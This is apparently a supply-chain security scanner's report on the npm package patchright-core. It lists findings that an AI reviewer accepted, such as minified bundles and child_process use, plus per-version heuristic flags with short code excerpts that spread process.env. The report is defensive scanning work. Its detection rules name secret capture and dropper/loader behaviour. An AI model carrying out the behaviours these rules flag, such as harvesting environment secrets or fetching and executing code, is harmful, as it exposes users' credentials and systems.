patchright-core
Supply chain provenance
Status for the latest visible version.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:lib/vite/traceViewer/assets/defaultSettingsView-C8oeflxp.js | AI (source-diff): Vite-bundled React UI with modulepreload fetch; not malicious. | ai | |
| source-diff | obfuscated-file:lib/coreBundle.js | AI (source-diff): esbuild-bundled core; standard for Playwright-based packages. | ai | |
| source-diff | obfuscated-file:lib/vite/traceViewer/assets/defaultSettingsView-C8oeflxp.js | AI (source-diff): Vite-bundled React UI asset with license headers intact. | ai | |
| source-diff | obfuscated-file:lib/vite/dashboard/assets/index-DpEq2p62.js | AI (source-diff): Vite-bundled dashboard UI asset; minification expected. | ai | |
| source-diff | obfuscated-file:lib/vite/recorder/assets/index-HP8IFpDn.js | AI (source-diff): Vite-bundled recorder UI asset; minification expected. | ai | |
| source-diff | obfuscated-file:lib/vite/traceViewer/index.C0VxHueI.js | AI (source-diff): Vite-bundled trace viewer asset; minification expected. | ai | |
| source-diff | obfuscated-file:lib/vite/traceViewer/uiMode.APN9uGJo.js | AI (source-diff): Vite-bundled trace viewer UI mode asset; minification expected. | ai | |
| source-diff | net-exec-file:lib/coreBundle.js | AI (source-diff): Browser automation core bundle; network + exec is inherent to its purpose. | ai | |
| source-diff | obfuscated-file:lib/vite/traceViewer/assets/codeMirrorModule-DHnJSckh.js | AI (source-diff): Vite-bundled CodeMirror asset; minification is expected for this package's UI components. | ai | |
| source-diff | obfuscated-file:lib/vite/recorder/assets/codeMirrorModule-Dk5H3Tt4.js | AI (source-diff): Vite-bundled CodeMirror asset; minification is expected. | ai | |
| semgrep | semgrep:child-process-import | AI (semgrep): Browser automation library requires child_process to launch browser binaries; expected pattern. | ai | |
| semgrep | semgrep:base64-decode | AI (semgrep): Network message handling in Playwright uses base64 for binary data transport; legitimate use. | ai | |
| semgrep | semgrep:dynamic-require | AI (semgrep): Reads package.json from browser reference directories to get version info; not arbitrary module loading. | ai | |
| semgrep | semgrep:new-function-constructor | AI (semgrep): Used to validate/parse JS expressions in Playwright's JS evaluation API; standard pattern. | ai | |
| semgrep | semgrep:env-bulk-read | AI (semgrep): Minified bundle; env enumeration is part of Playwright's config/environment handling. | ai | |
| bogus-package | bogus-package | AI (bogus-package): Core bundle package; no runtime deps and minimal README are expected for this package type. | ai | |
| semgrep | semgrep:env-spread | AI (semgrep): Playwright-pattern: spreading process.env when spawning browser subprocess is standard and documented. | ai |
Versions (showing 9 of 9)
| Version | Deps | Published |
|---|---|---|
| 1.60.2 | 0 / 0 | |
| 1.60.1 | 0 / 0 | |
| 1.60.0 | 0 / 0 | |
| 1.59.4 | 0 / 0 | |
| 1.59.3 | 0 / 0 | |
| 1.59.2 | 0 / 0 | |
| 1.59.1 | 0 / 0 | |
| 1.59.0 | 0 / 0 | |
| 1.58.2 | 0 / 0 |
v1.60.2
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.60.1
11 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.60.0
11 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.59.3
4 findingsSpreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/outofprocess.js#L52 50 | stdio: "pipe", 51 | detached: true, > 52 | env: { 53 | ...process.env, 54 | ...env
Spreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L302 300 | const { stdout, code } = await (0, import_spawnAsync.spawnAsync)(executable, [filePath], { 301 | cwd: dirname, > 302 | env: { 303 | ...process.env, 304 | LD_LIBRARY_PATH: process.env.LD_LIBRARY_PATH ? `${process.env.LD_LIBRARY_PATH}:${dirname}` : dirname
Spreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L319 317 | const { stdout, code } = await (0, import_spawnAsync.spawnAsync)("ldd", [filePath], { 318 | cwd: dirname, > 319 | env: { 320 | ...process.env, 321 | LD_LIBRARY_PATH
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.59.2
4 findingsSpreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/outofprocess.js#L52 50 | stdio: "pipe", 51 | detached: true, > 52 | env: { 53 | ...process.env, 54 | ...env
Spreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L302 300 | const { stdout, code } = await (0, import_spawnAsync.spawnAsync)(executable, [filePath], { 301 | cwd: dirname, > 302 | env: { 303 | ...process.env, 304 | LD_LIBRARY_PATH: process.env.LD_LIBRARY_PATH ? `${process.env.LD_LIBRARY_PATH}:${dirname}` : dirname
Spreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L319 317 | const { stdout, code } = await (0, import_spawnAsync.spawnAsync)("ldd", [filePath], { 318 | cwd: dirname, > 319 | env: { 320 | ...process.env, 321 | LD_LIBRARY_PATH
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.59.1
4 findingsSpreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/outofprocess.js#L52 50 | stdio: "pipe", 51 | detached: true, > 52 | env: { 53 | ...process.env, 54 | ...env
Spreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L302 300 | const { stdout, code } = await (0, import_spawnAsync.spawnAsync)(executable, [filePath], { 301 | cwd: dirname, > 302 | env: { 303 | ...process.env, 304 | LD_LIBRARY_PATH: process.env.LD_LIBRARY_PATH ? `${process.env.LD_LIBRARY_PATH}:${dirname}` : dirname
Spreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/d466ac5358cae058cdc75d2ae3ab3ad220042730/lib/server/registry/dependencies.js#L319 317 | const { stdout, code } = await (0, import_spawnAsync.spawnAsync)("ldd", [filePath], { 318 | cwd: dirname, > 319 | env: { 320 | ...process.env, 321 | LD_LIBRARY_PATH
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v1.59.0
4 findingsSpreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/01b2b1533e0bfa1c582117e3ec109fcb57657747/lib/outofprocess.js#L52 50 | stdio: "pipe", 51 | detached: true, > 52 | env: { 53 | ...process.env, 54 | ...env
Spreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/01b2b1533e0bfa1c582117e3ec109fcb57657747/lib/server/registry/dependencies.js#L302 300 | const { stdout, code } = await (0, import_spawnAsync.spawnAsync)(executable, [filePath], { 301 | cwd: dirname, > 302 | env: { 303 | ...process.env, 304 | LD_LIBRARY_PATH: process.env.LD_LIBRARY_PATH ? `${process.env.LD_LIBRARY_PATH}:${dirname}` : dirname
Spreading entire process.env into an object — may capture all secrets Source: https://github.com/Kaliiiiiiiiii-Vinyzu/patchright-nodejs/blob/01b2b1533e0bfa1c582117e3ec109fcb57657747/lib/server/registry/dependencies.js#L319 317 | const { stdout, code } = await (0, import_spawnAsync.spawnAsync)("ldd", [filePath], { 318 | cwd: dirname, > 319 | env: { 320 | ...process.env, 321 | LD_LIBRARY_PATH
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.